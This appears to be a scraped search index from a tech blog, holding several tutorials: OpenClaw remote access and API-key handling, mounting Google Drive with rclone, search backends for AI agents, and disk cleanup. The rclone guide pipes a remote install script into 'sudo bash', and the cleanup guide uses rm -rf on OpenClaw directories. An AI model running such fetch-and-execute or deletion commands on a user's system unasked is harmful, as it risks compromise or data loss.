on your home server and 
access it remotely from your phone\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eShare an OpenClaw instance with your team\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUse your home AI assistant while away\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThen \u003cstrong\u003eTailscale\u003c/strong\u003e integration is your best choice.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"what-is-tailscale\"\u003eWhat is Tailscale?\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://tailscale.com/\"\u003eTailscale\u003c/a\u003e is a zero-config VPN tool based on WireGuard. It lets you easily build a private network (Tailnet) and securely connect any devices.\u003c/p\u003e","title":"OpenClaw + Tailscale Remote Access Guide: Two Secure Ways to Expose Your Gateway"},{"content":"The Problem with Plaintext Keys When setting up OpenClaw, you\u0026rsquo;re dealing with sensitive credentials:\nDiscord Bot Tokens AI API Keys (Kimi, OpenAI, etc.) Service credentials The temptation: Just paste them into openclaw.json\nThe risk: One accidental git commit, and your keys are public.\nThe Solution: Environment Variables OpenClaw supports referencing environment variables in configuration. 
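To make the placeholder mechanism concrete, here is a minimal, hypothetical sketch of how a config loader can resolve ${env:VAR} references at startup. This is illustrative only, not OpenClaw's actual resolver; the function and regex names are assumptions:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Sketch: resolve ${env:VAR} placeholders in a parsed JSON config (hypothetical)\u0026#34;\u0026#34;\u0026#34; import json import os import re # Matches ${env:VAR_NAME} placeholders (assumed syntax, mirroring the examples below) _ENV_REF = re.compile(r\u0026#39;\\$\\{env:([A-Za-z0-9_]+)\\}\u0026#39;) def resolve_env_refs(value): \u0026#34;\u0026#34;\u0026#34;Recursively replace ${env:VAR} placeholders in a parsed config\u0026#34;\u0026#34;\u0026#34; if isinstance(value, str): def _sub(match): name = match.group(1) if name not in os.environ: raise KeyError(f\u0026#39;Cannot resolve env variable: {name}\u0026#39;) return os.environ[name] return _ENV_REF.sub(_sub, value) if isinstance(value, dict): return {k: resolve_env_refs(v) for k, v in value.items()} if isinstance(value, list): return [resolve_env_refs(v) for v in value] return value if __name__ == \u0026#39;__main__\u0026#39;: os.environ[\u0026#39;DISCORD_BOT_TOKEN\u0026#39;] = \u0026#39;example-token\u0026#39; config = json.loads(\u0026#39;{\u0026#34;channels\u0026#34;: {\u0026#34;discord\u0026#34;: {\u0026#34;token\u0026#34;: \u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34;}}}\u0026#39;) print(resolve_env_refs(config)[\u0026#39;channels\u0026#39;][\u0026#39;discord\u0026#39;][\u0026#39;token\u0026#39;]) The point of doing this at load time is that the file on disk never holds the secret itself.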
Your config file only contains placeholders, actual values live in environment variables.\nHow It Works { \u0026#34;channels\u0026#34;: { \u0026#34;discord\u0026#34;: { \u0026#34;token\u0026#34;: \u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34; } } } The ${env:VAR_NAME} syntax tells OpenClaw to read from environment variables at runtime.\nSupported Environment Variables Based on OpenClaw source code, these are officially supported:\nService Variable Name Config Path Discord DISCORD_BOT_TOKEN channels.discord.token Kimi AI KIMI_API_KEY Auth profiles Moonshot MOONSHOT_API_KEY Auth profiles OpenAI OPENAI_API_KEY Model providers Anthropic ANTHROPIC_API_KEY Model providers Gateway OPENCLAW_GATEWAY_TOKEN gateway.auth.token Full list from source:\nOPENAI_API_KEY, ANTHROPIC_API_KEY, ANTHROPIC_OAUTH_TOKEN, GEMINI_API_KEY, ZAI_API_KEY, OPENROUTER_API_KEY, AI_GATEWAY_API_KEY, MINIMAX_API_KEY, SYNTHETIC_API_KEY, KILOCODE_API_KEY, ELEVENLABS_API_KEY, TELEGRAM_BOT_TOKEN, DISCORD_BOT_TOKEN, SLACK_BOT_TOKEN, SLACK_APP_TOKEN, OPENCLAW_GATEWAY_TOKEN, OPENCLAW_GATEWAY_PASSWORD, KIMI_API_KEY, MOONSHOT_API_KEY Setup Methods Method 1: Shell Environment export DISCORD_BOT_TOKEN=\u0026#34;your-token-here\u0026#34; export KIMI_API_KEY=\u0026#34;your-key-here\u0026#34; openclaw gateway restart Pros: Quick, good for testing\nCons: Lost on shell exit, not persistent\nMethod 2: Environment File (Recommended) Create ~/.openclaw/.env:\nDISCORD_BOT_TOKEN=your-token-here KIMI_API_KEY=your-key-here OpenClaw automatically loads this on startup.\nPros: Persistent, organized, no shell pollution\nCons: File permissions matter\nSecure the file:\nchmod 600 ~/.openclaw/.env Method 3: Systemd Service For systemd-managed gateway, edit the service file:\n[Service] EnvironmentFile=/home/warwick/.openclaw/.env Then reload:\nsystemctl --user daemon-reload systemctl --user restart openclaw-gateway Complete Configuration Example 1. 
Create Environment File ~/.openclaw/.env:\n# Discord DISCORD_BOT_TOKEN=MTQ2Njc4MDY2NzgwNjIyMDM2NA.GvboSs.xxxxxxxxxxxxxxxxxxxxx # AI Services KIMI_API_KEY=sk-kimi-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx # Gateway Auth (run: openssl rand -hex 32, then paste the output; .env files are not shell scripts, so $(...) is not expanded) OPENCLAW_GATEWAY_TOKEN=your-generated-hex-token 2. Update openclaw.json { \u0026#34;channels\u0026#34;: { \u0026#34;discord\u0026#34;: { \u0026#34;enabled\u0026#34;: true, \u0026#34;token\u0026#34;: \u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34; } }, \u0026#34;gateway\u0026#34;: { \u0026#34;auth\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;token\u0026#34;, \u0026#34;token\u0026#34;: \u0026#34;${env:OPENCLAW_GATEWAY_TOKEN}\u0026#34; } } } 3. Restart Gateway openclaw gateway restart Security Best Practices 1. Never Commit .env Files Add to .gitignore:\n.env .env.local *.env openclaw.json.bak 2. Use Different Tokens for Different Environments # Production DISCORD_BOT_TOKEN_PROD=xxx # Development DISCORD_BOT_TOKEN_DEV=yyy 3. Rotate Keys Regularly Set a calendar reminder every 90 days to regenerate tokens.\n4. Audit Your Config openclaw secrets audit This shows which keys are still in plaintext.\n5.
Backup Strategy # Backup config (without secrets) cp ~/.openclaw/openclaw.json ~/backup/ # Backup .env separately (encrypt it) gpg -c ~/.openclaw/.env Migration Guide From Plaintext to Environment Variables Step 1: Extract current keys\ngrep -E \u0026#39;\u0026#34;token\u0026#34;|\u0026#34;key\u0026#34;|\u0026#34;password\u0026#34;\u0026#39; ~/.openclaw/openclaw.json Step 2: Create .env file\ncat \u0026gt; ~/.openclaw/.env \u0026lt;\u0026lt; \u0026#39;EOF\u0026#39; DISCORD_BOT_TOKEN=your-extracted-token KIMI_API_KEY=your-extracted-key EOF chmod 600 ~/.openclaw/.env Step 3: Update config to use env vars Replace \u0026quot;token\u0026quot;: \u0026quot;actual-token\u0026quot; with \u0026quot;token\u0026quot;: \u0026quot;${env:DISCORD_BOT_TOKEN}\u0026quot;\nStep 4: Verify\nopenclaw secrets audit # Should show no plaintext keys Step 5: Restart\nopenclaw gateway restart Troubleshooting \u0026ldquo;Cannot resolve env variable\u0026rdquo; Check: Variable is actually set\necho $DISCORD_BOT_TOKEN Check: No spaces around = in .env file\n# Wrong DISCORD_BOT_TOKEN = token-here # Right DISCORD_BOT_TOKEN=token-here Gateway can\u0026rsquo;t find .env Check: File location\nls -la ~/.openclaw/.env Check: File permissions\nchmod 600 ~/.openclaw/.env Environment variables not loading For systemd:\n# Check if EnvironmentFile is set systemctl --user cat openclaw-gateway.service | grep Environment # Reload and restart systemctl --user daemon-reload systemctl --user restart openclaw-gateway Alternative: Password Store For even better security, use a password manager:\nWith pass # Store token pass insert openclaw/discord-token # Retrieve in script export DISCORD_BOT_TOKEN=$(pass openclaw/discord-token) openclaw gateway restart With 1Password CLI export DISCORD_BOT_TOKEN=$(op read \u0026#34;op://Private/OpenClaw/discord-token\u0026#34;) Summary Approach Security Convenience Best For Plaintext config ❌ Poor ✅ Easy Never Environment variables ✅ Good ✅ Easy Most users .env file ✅ Good ✅ Easy 
Development Password store ✅ Excellent ⚠️ Setup Security-focused Recommendation: Use .env file for most setups, password store for high-security environments.\nRemember: Security is about trade-offs. Environment variables hit the sweet spot between security and convenience for most OpenClaw deployments.\n","permalink":"https://www.d5n.xyz/en/posts/openclaw-secretref-guide/","summary":"\u003ch2 id=\"the-problem-with-plaintext-keys\"\u003eThe Problem with Plaintext Keys\u003c/h2\u003e\n\u003cp\u003eWhen setting up OpenClaw, you\u0026rsquo;re dealing with sensitive credentials:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDiscord Bot Tokens\u003c/li\u003e\n\u003cli\u003eAI API Keys (Kimi, OpenAI, etc.)\u003c/li\u003e\n\u003cli\u003eService credentials\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eThe temptation:\u003c/strong\u003e Just paste them into \u003ccode\u003eopenclaw.json\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eThe risk:\u003c/strong\u003e One accidental git commit, and your keys are public.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"the-solution-environment-variables\"\u003eThe Solution: Environment Variables\u003c/h2\u003e\n\u003cp\u003eOpenClaw supports referencing environment variables in configuration. 
Your config file only contains placeholders, actual values live in environment variables.\u003c/p\u003e\n\u003ch3 id=\"how-it-works\"\u003eHow It Works\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-json\" data-lang=\"json\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e{\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  \u003cspan style=\"color:#f92672\"\u003e\u0026#34;channels\u0026#34;\u003c/span\u003e: {\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    \u003cspan style=\"color:#f92672\"\u003e\u0026#34;discord\u0026#34;\u003c/span\u003e: {\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e      \u003cspan style=\"color:#f92672\"\u003e\u0026#34;token\u0026#34;\u003c/span\u003e: \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e}\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eThe \u003ccode\u003e${env:VAR_NAME}\u003c/code\u003e syntax tells OpenClaw to read from environment variables at runtime.\u003c/p\u003e","title":"OpenClaw API Key Management: Environment Variables Best Practices"},{"content":"The Use Case You have files in Google Drive but need them accessible locally:\nEdit documents with local tools Backup local files to cloud Sync across multiple machines Access without browser Rclone is the best tool for this. 
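To make that claim concrete before installing anything: rclone's two core verbs, copy and sync, behave for cloud remotes exactly as they do for local directories, and the difference matters because sync deletes. A hedged local sketch of the distinction (rclone itself is not needed to follow it; the rclone commands in the comments are illustrative):

```shell
# Stand-ins for a local directory and a remote: src has a new file, dst a stale one
mkdir -p /tmp/rclone-demo/src /tmp/rclone-demo/dst
echo "new"   > /tmp/rclone-demo/src/a.txt
echo "stale" > /tmp/rclone-demo/dst/old.txt
# "rclone copy src remote:dst" would upload a.txt and leave old.txt alone;
# "rclone sync src remote:dst" would upload a.txt AND delete old.txt,
# making the destination an exact mirror of the source.
diff -rq /tmp/rclone-demo/src /tmp/rclone-demo/dst || true
```

The rule of thumb that follows from this difference: prefer copy when unsure, and always preview sync with --dry-run.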
It\u0026rsquo;s like rsync for cloud storage.\nInstallation Option 1: Package Manager # Debian/Ubuntu sudo apt install rclone # macOS brew install rclone # Arch sudo pacman -S rclone Option 2: Install Script curl https://rclone.org/install.sh | sudo bash Verify installation:\nrclone version Google Drive Setup Step 1: Create Rclone Config rclone config Interactive prompts:\nn (new remote) Name: gdrive Type: drive (type the backend name rather than its menu number, which shifts between rclone releases) Client ID: (press Enter for default) Client Secret: (press Enter for default) Scope: 1 (Full access) Root folder: (press Enter) Service account: n Edit advanced config: n Use auto config: y Step 2: Authenticate A browser window opens automatically. If not:\nrclone authorize \u0026#34;drive\u0026#34; Copy the token and paste it back into the terminal.\nStep 3: Verify rclone listremotes # Output: gdrive: rclone lsd gdrive: # Lists your Drive folders Mounting Google Drive Basic Mount # Create mount point mkdir -p ~/GoogleDrive # Mount rclone mount gdrive: ~/GoogleDrive Keep terminal open. 
Press Ctrl+C to unmount.\nBackground Mount rclone mount gdrive: ~/GoogleDrive --daemon Recommended Mount Options rclone mount gdrive: ~/GoogleDrive \\ --daemon \\ --vfs-cache-mode writes \\ --vfs-cache-max-size 1G \\ --vfs-read-chunk-size 16M \\ --buffer-size 32M \\ --poll-interval 30s \\ --dir-cache-time 72h Options explained:\n--vfs-cache-mode writes – Cache files being written --vfs-cache-max-size 1G – Limit cache to 1GB --vfs-read-chunk-size 16M – Read in 16MB chunks --buffer-size 32M – Read ahead buffer --poll-interval 30s – Check for changes every 30s --dir-cache-time 72h – Cache directory listings Auto-Mount on Boot Using Systemd Create ~/.config/systemd/user/rclone-gdrive.service:\n[Unit] Description=Mount Google Drive with Rclone After=network-online.target Wants=network-online.target [Service] Type=notify ExecStart=/usr/bin/rclone mount gdrive: %h/GoogleDrive \\ --vfs-cache-mode writes \\ --vfs-cache-max-size 1G \\ --buffer-size 32M \\ --poll-interval 30s \\ --dir-cache-time 72h ExecStop=/bin/fusermount -u %h/GoogleDrive Restart=on-failure RestartSec=10 [Install] WantedBy=default.target Enable and start:\nsystemctl --user daemon-reload systemctl --user enable rclone-gdrive.service systemctl --user start rclone-gdrive.service Check status:\nsystemctl --user status rclone-gdrive.service Using fstab (Alternative) Add to /etc/fstab:\n# Google Drive via rclone gdrive: /home/warwick/GoogleDrive rclone rw,noauto,user,_netdev,x-systemd.automount,args2env,vfs_cache_mode=writes,vfs_cache_max_size=1G 0 0 Then:\nsudo systemctl daemon-reload mount ~/GoogleDrive Common Operations Sync Local to Drive # Upload local folder to Drive rclone sync ~/Documents/Important gdrive:Backup/Documents # Dry run first (see what would happen) rclone sync ~/Documents/Important gdrive:Backup/Documents --dry-run Sync Drive to Local # Download from Drive rclone sync gdrive:Photos ~/Pictures/DrivePhotos Copy with Progress rclone copy ~/LargeFile.zip gdrive:Uploads --progress Check 
Differences rclone check ~/LocalFolder gdrive:RemoteFolder Mount Specific Folder rclone mount gdrive:Documents/Work ~/WorkDrive Performance Tuning For Large Files rclone mount gdrive: ~/GoogleDrive \\ --vfs-cache-mode full \\ --vfs-cache-max-size 5G \\ --vfs-read-chunk-size 128M \\ --buffer-size 256M \\ --drive-chunk-size 128M For Many Small Files rclone mount gdrive: ~/GoogleDrive \\ --vfs-cache-mode writes \\ --vfs-cache-max-size 500M \\ --transfers 8 \\ --checkers 16 Troubleshooting \u0026ldquo;Transport endpoint is not connected\u0026rdquo; Drive got disconnected. Remount:\nfusermount -u ~/GoogleDrive rclone mount gdrive: ~/GoogleDrive --daemon Slow Performance Check cache settings and connection:\nrclone mount gdrive: ~/GoogleDrive --vfs-cache-mode full --log-level INFO Authentication Expired Re-authenticate:\nrclone config reconnect gdrive: Permission Denied Check mount point ownership:\nls -la ~/GoogleDrive sudo chown $USER:$USER ~/GoogleDrive Security Notes Config file contains tokens – Keep ~/.config/rclone/rclone.conf secure Use scope-limited access – Don\u0026rsquo;t use \u0026ldquo;full access\u0026rdquo; if unnecessary Regular token rotation – Re-authenticate periodically Backup your config – Lose it, lose access Backup rclone config:\ncp ~/.config/rclone/rclone.conf ~/.config/rclone/rclone.conf.backup Unmounting # Normal unmount fusermount -u ~/GoogleDrive # Force unmount if stuck fusermount -uz ~/GoogleDrive Summary You now have:\n✅ Google Drive mounted locally ✅ Auto-mount on boot ✅ Optimized performance settings ✅ Sync/copy operations ready Your cloud files are now just files in ~/GoogleDrive.\nReferences:\nRclone Documentation Google Drive Backend Rclone Mount Guide ","permalink":"https://www.d5n.xyz/en/posts/rclone-google-drive-mount/","summary":"\u003ch2 id=\"the-use-case\"\u003eThe Use Case\u003c/h2\u003e\n\u003cp\u003eYou have files in Google Drive but need them accessible locally:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eEdit documents 
with local tools\u003c/li\u003e\n\u003cli\u003eBackup local files to cloud\u003c/li\u003e\n\u003cli\u003eSync across multiple machines\u003c/li\u003e\n\u003cli\u003eAccess without browser\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eRclone\u003c/strong\u003e is the best tool for this. It\u0026rsquo;s like \u003ccode\u003ersync\u003c/code\u003e for cloud storage.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003ch3 id=\"option-1-package-manager\"\u003eOption 1: Package Manager\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Debian/Ubuntu\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install rclone\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# macOS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ebrew install rclone\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Arch\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo pacman -S rclone\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"option-2-install-script\"\u003eOption 2: Install Script\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl https://rclone.org/install.sh | sudo bash\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eVerify installation:\u003c/p\u003e","title":"Mounting Google Drive on Linux with Rclone: Complete Guide"},{"content":"Why Search Matters for AI Agents AI models have knowledge cutoffs. To answer questions about current events, recent documentation, or real-time data, they need search capabilities.\nCommon use cases:\nCurrent news and events Latest documentation Fact verification Research assistance Option 1: SearXNG (Self-Hosted) SearXNG is a privacy-respecting metasearch engine you host yourself.\nHow It Works Aggregates results from multiple search engines (Google, Bing, DuckDuckGo, etc.) without tracking users.\nSetup # Docker deployment docker run -d \\ --name searxng \\ -p 8888:8080 \\ -v \u0026#34;${PWD}/searxng:/etc/searxng\u0026#34; \\ searxng/searxng:latest Or use the install script:\ncd /usr/local sudo git clone https://github.com/searxng/searxng.git sudo searxng/utils/searxng.sh install all Pros ✅ Free (just server costs) ✅ Privacy-focused ✅ No API limits ✅ Aggregates multiple engines Cons ❌ Self-hosted (you maintain it) ❌ Can be blocked by search engines ❌ Requires technical setup Best For Privacy-conscious users Technical users comfortable with self-hosting High-volume search needs Option 2: Tavily (Managed) Tavily is a search API specifically designed for AI agents.\nFeatures Optimized for LLM context windows Includes relevant snippets Source credibility scoring Structured JSON responses Pricing Free tier: 1,000 calls/month Pro: $0.025/call Enterprise: Custom Integration import requests response = requests.post( \u0026#34;https://api.tavily.com/search\u0026#34;, json={ \u0026#34;api_key\u0026#34;: 
\u0026#34;your-api-key\u0026#34;, \u0026#34;query\u0026#34;: \u0026#34;latest AI developments\u0026#34;, \u0026#34;search_depth\u0026#34;: \u0026#34;basic\u0026#34;, \u0026#34;include_answer\u0026#34;: True } ) Pros ✅ Purpose-built for AI ✅ No infrastructure to maintain ✅ High-quality results ✅ Easy integration Cons ❌ Paid for high volume ❌ External dependency ❌ Rate limits on free tier Best For Production applications Teams without DevOps resources Quick prototyping Option 3: Custom Implementation Build your own search pipeline.\nArchitecture User Query ↓ [Query Processing] → Expand keywords, detect intent ↓ [Multi-Source Search] → Google API, Bing API, News APIs ↓ [Result Aggregation] → Deduplicate, rank, filter ↓ [Content Extraction] → Fetch full pages, extract text ↓ [Response Generation] → Format for LLM context Components Needed Search APIs\nGoogle Custom Search API ($5/1000 queries) Bing Search API ($7/1000 queries) SerpAPI ($50/month unlimited) Content Extraction\nBeautifulSoup/Scrapy for HTML parsing Newspaper3k for article extraction Firecrawl for JavaScript-rendered pages Result Processing\nDeduplication (SimHash, MinHash) Re-ranking (BM25, custom ML model) Content summarization Pros ✅ Full control ✅ Customizable ranking ✅ No vendor lock-in Cons ❌ High development effort ❌ Maintenance overhead ❌ Multiple API integrations Best For Large-scale applications Specific domain requirements Teams with dedicated resources Feature Comparison Feature SearXNG Tavily Custom Setup Complexity Medium Low High Ongoing Maintenance Medium None High Cost Server only Per-query API costs Privacy Excellent Good Depends Result Quality Good Excellent Configurable Rate Limits None Yes API-dependent AI Optimization Manual Built-in Custom My Recommendation For Personal/Experimentation SearXNG – Free, private, good enough for most needs.\nFor Production Tavily – Purpose-built, reliable, worth the cost for serious applications.\nFor Scale Custom – When you have specific needs and 
engineering resources.\nImplementation Example: SearXNG with OpenClaw (enable the json output format in SearXNG\u0026rsquo;s settings.yml first; requests with format=json are rejected otherwise) # Add to TOOLS.md curl -s \u0026#34;http://localhost:8888/search?q=QUERY\u0026amp;format=json\u0026#34; | \\ jq -r \u0026#39;.results[] | \u0026#34;\\(.title)\\n\\(.url)\\n\\(.content)\\n---\u0026#34;\u0026#39; # search.py wrapper import requests import sys def search(query): url = \u0026#34;http://localhost:8888/search\u0026#34; params = {\u0026#34;q\u0026#34;: query, \u0026#34;format\u0026#34;: \u0026#34;json\u0026#34;} resp = requests.get(url, params=params) data = resp.json() for result in data.get(\u0026#34;results\u0026#34;, [])[:5]: print(f\u0026#34;**{result[\u0026#39;title\u0026#39;]}**\u0026#34;) print(f\u0026#34;{result[\u0026#39;url\u0026#39;]}\u0026#34;) print(f\u0026#34;{result[\u0026#39;content\u0026#39;][:200]}...\\n\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: search(\u0026#34; \u0026#34;.join(sys.argv[1:])) Conclusion Your Situation Choose Budget-conscious, technical SearXNG Production, fast delivery Tavily Scale, specific requirements Custom Start with SearXNG for experimentation. Move to Tavily when you need reliability without infrastructure work. Build custom only when you outgrow managed solutions.\nReferences:\nSearXNG GitHub Tavily Documentation Google Custom Search API ","permalink":"https://www.d5n.xyz/en/posts/openclaw-search-solutions-comparison/","summary":"\u003ch2 id=\"why-search-matters-for-ai-agents\"\u003eWhy Search Matters for AI Agents\u003c/h2\u003e\n\u003cp\u003eAI models have knowledge cutoffs. 
To answer questions about current events, recent documentation, or real-time data, they need search capabilities.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eCommon use cases:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCurrent news and events\u003c/li\u003e\n\u003cli\u003eLatest documentation\u003c/li\u003e\n\u003cli\u003eFact verification\u003c/li\u003e\n\u003cli\u003eResearch assistance\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"option-1-searxng-self-hosted\"\u003eOption 1: SearXNG (Self-Hosted)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/searxng/searxng\"\u003eSearXNG\u003c/a\u003e is a privacy-respecting metasearch engine you host yourself.\u003c/p\u003e\n\u003ch3 id=\"how-it-works\"\u003eHow It Works\u003c/h3\u003e\n\u003cp\u003eAggregates results from multiple search engines (Google, Bing, DuckDuckGo, etc.) without tracking users.\u003c/p\u003e\n\u003ch3 id=\"setup\"\u003eSetup\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Docker deployment\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edocker run -d \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e\u003c/span\u003e  --name searxng \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e\u003c/span\u003e  -p 8888:8080 \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e\u003c/span\u003e  -v \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e${\u003c/span\u003ePWD\u003cspan style=\"color:#e6db74\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e/searxng:/etc/searxng\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#ae81ff\"\u003e\u003c/span\u003e  searxng/searxng:latest\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eOr use the install script:\u003c/p\u003e","title":"Search Solutions for AI Agents: SearXNG vs. Tavily vs. Custom"},{"content":"The Problem After running OpenClaw for a while, you might notice disk space creeping up. Here\u0026rsquo;s how to identify what\u0026rsquo;s using space and safely clean it up.\nFinding What\u0026rsquo;s Using Space Check OpenClaw Directory Size du -sh ~/.openclaw/ Breakdown by Subdirectory cd ~/.openclaw du -h --max-depth=1 | sort -hr Typical output:\n2.1G ./node_modules 450M ./completions 120M ./logs 85M ./subagents 12M ./cron 8.2M ./config Safe Cleanup Targets 1. Old Completions Completions (AI-generated responses) accumulate over time:\n# Check size ls -lah ~/.openclaw/completions/ # Remove completions older than 30 days find ~/.openclaw/completions/ -type f -mtime +30 -delete 2. Log Files Logs can grow indefinitely:\n# Check current logs ls -lah ~/.openclaw/logs/ # Truncate large logs \u0026gt; ~/.openclaw/logs/commands.log # Or archive and clear tar czf ~/openclaw-logs-$(date +%Y%m%d).tar.gz ~/.openclaw/logs/ rm -rf ~/.openclaw/logs/* 3. 
Subagent History Subagent sessions store message history:\n# Check subagent storage du -sh ~/.openclaw/subagents/ # Review and remove old sessions ls -lt ~/.openclaw/subagents/ rm -rf ~/.openclaw/subagents/old-session-id 4. Cache Files Various caches can be cleared:\n# Clear tool result cache rm -rf ~/.openclaw/.cache/ # Clear any application caches rm -rf ~/.cache/openclaw/ What NOT to Delete Never delete:\n~/.openclaw/openclaw.json – Your main configuration ~/.openclaw/credentials/ – Stored credentials ~/.openclaw/agents/ – Agent configurations ~/.openclaw/cron/jobs.json – Scheduled tasks Automated Cleanup Script Create ~/.openclaw/cleanup.sh:\n#!/bin/bash # OpenClaw maintenance cleanup echo \u0026#34;Starting OpenClaw cleanup...\u0026#34; # Clean completions older than 30 days echo \u0026#34;Cleaning old completions...\u0026#34; find ~/.openclaw/completions/ -type f -mtime +30 -delete 2\u0026gt;/dev/null # Rotate logs if over 100MB (-s gives one total line, so cut -f1 yields a single number) LOG_SIZE=$(du -sm ~/.openclaw/logs/ 2\u0026gt;/dev/null | cut -f1) if [ \u0026#34;$LOG_SIZE\u0026#34; -gt 100 ]; then echo \u0026#34;Rotating logs (current: ${LOG_SIZE}MB)...\u0026#34; tar czf ~/openclaw-logs-$(date +%Y%m%d).tar.gz ~/.openclaw/logs/ 2\u0026gt;/dev/null \u0026gt; ~/.openclaw/logs/commands.log fi # Clean temp files rm -rf ~/.openclaw/.tmp/* 2\u0026gt;/dev/null echo \u0026#34;Cleanup complete!\u0026#34; du -sh ~/.openclaw/ Make executable and run:\nchmod +x ~/.openclaw/cleanup.sh ~/.openclaw/cleanup.sh Setting Up Log Rotation Using logrotate Create /etc/logrotate.d/openclaw:\n/home/warwick/.openclaw/logs/*.log { daily missingok rotate 7 compress delaycompress notifempty create 644 warwick warwick } Using systemd timer Create 